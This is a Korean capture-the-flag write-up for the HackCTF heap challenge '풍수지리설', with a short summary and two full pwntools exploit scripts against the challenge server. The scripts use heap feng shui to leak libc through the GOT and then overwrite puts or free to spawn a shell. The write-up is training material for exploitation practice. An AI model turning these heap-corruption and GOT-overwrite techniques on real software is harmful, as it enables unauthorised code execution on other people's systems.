풍수지리설

HackCTF

풍수지리설

Rasser 2022. 1. 13. 14:49

요약

- Heap의 레이아웃을 변경하여 공격하는 문제

- Heap Feng Shui를 이용

- 2개의 해답이 나올 수 있음(one_gadget을 이용하거나 system을 이용하는 방법)

공격방법

- Lazenca에서 나온 문제와 거의 동일함

- Lazenca 문제를 응용하면 됨

Exploit Code

1. one_gadget을 이용하는 방법

from pwn import *
context.log_level='debug'

p = remote('ctf.j0n9hyun.xyz', 3028)
e = ELF('./fengshui')
libc = ELF('./libc.so.6')
one = [0x3ac5c, 0x3ac5e, 0x3ac62, 0x3ac69] # libc.so.6

def add_location(desc_size, name, leng, data):
    p.sendlineafter('Choice: ', '0')
    p.sendlineafter('description: ', str(desc_size))
    p.sendlineafter('Name: ', name)
    p.sendlineafter('length: ', str(leng))
    p.sendlineafter('Text: ', data)

def del_location(index):
    p.sendlineafter('Choice: ', '1')
    p.sendlineafter('Index: ', str(index))

def display(index):
    p.sendlineafter('Choice: ', '2')
    p.sendlineafter('Index: ', str(index))

def update_location(index, length, data):
    p.sendlineafter('Choice: ', '3')
    p.sendlineafter('Index: ', str(index))
    p.sendlineafter('length: ', str(length))
    p.sendlineafter('Text: ', data)

# Allocate chunks
add_location(10, 'A'*10, 10, 'a'*10)
add_location(10, 'B'*10, 10, 'b'*10)
add_location(10, 'C'*10, 10, 'c'*10)

#delete chunks
del_location(0)

# heap feng shui
# free전 메모리의 구조를 그대로 맞춰줘서 exploit에 용이하게 함
add_location(120, p32(0xcafebebe)*2, 160, p32(0xdeadbeef)*30+p32(0)*2+p32(0x88)+p32(0x11)+p32(0)*3+p32(0x89)+p32(e.got['puts']))

# leak libc base
display(1)
p.recvuntil('Description: ')
leak_puts = u32(p.recv(4))
libc_base = leak_puts - libc.symbols['puts']
system  = libc_base + libc.symbols['system']
one_gadget = one[0] + libc_base
print('libc_base: ' + hex(libc_base))

# overwrite puts to one_gadget
update_location(1, 4, p32(one_gadget))
p.interactive()

2. System을 이용하는 방법

from pwn import *
# context.log_level='debug'

p = remote('ctf.j0n9hyun.xyz', 3028)
e = ELF('./fengshui')
libc = ELF('./libc.so.6')
one = [0x3ac5c, 0x3ac5e, 0x3ac62, 0x3ac69] # libc.so.6

def add_location(desc_size, name, leng, data):
    p.sendlineafter('Choice: ', '0')
    p.sendlineafter('description: ', str(desc_size))
    p.sendlineafter('Name: ', name)
    p.sendlineafter('length: ', str(leng))
    p.sendlineafter('Text: ', data)

def del_location(index):
    p.sendlineafter('Choice: ', '1')
    p.sendlineafter('Index: ', str(index))

def display(index):
    p.sendlineafter('Choice: ', '2')
    p.sendlineafter('Index: ', str(index))

def update_location(index, length, data):
    p.sendlineafter('Choice: ', '3')
    p.sendlineafter('Index: ', str(index))
    p.sendlineafter('length: ', str(length))
    p.sendlineafter('Text: ', data)

# Allocate chunks
add_location(10, 'A'*10, 10, 'a'*10)	# 0
add_location(10, 'B'*10, 10, 'b'*10)	# 1
add_location(10, '/bin/sh\x00', 10, '/bin/sh\x00') # 2

#delete chunks
del_location(0)

# heap feng shui
add_location(120, p32(0xcafebebe)*2, 160, p32(0xdeadbeef)*30+p32(0)*2+p32(0x88)+p32(0x11)+p32(0)*3+p32(0x89)+p32(e.got['free']))	# 3

# leak libc base
display(1)
p.recvuntil('Description: ')
leak_puts = u32(p.recv(4))
libc_base = leak_puts - libc.symbols['free']
system  = libc_base + libc.symbols['system']
one_gadget = one[0] + libc_base
print('libc_base: ' + hex(libc_base))

# overwrite free to system
update_location(1, 4, p32(system))

# free('/bin/sh\x00') -> system('/bin/sh\x00')
del_location(2)
p.interactive()

참조

https://www.lazenca.net/display/TEC/12.Heap+Feng+Shui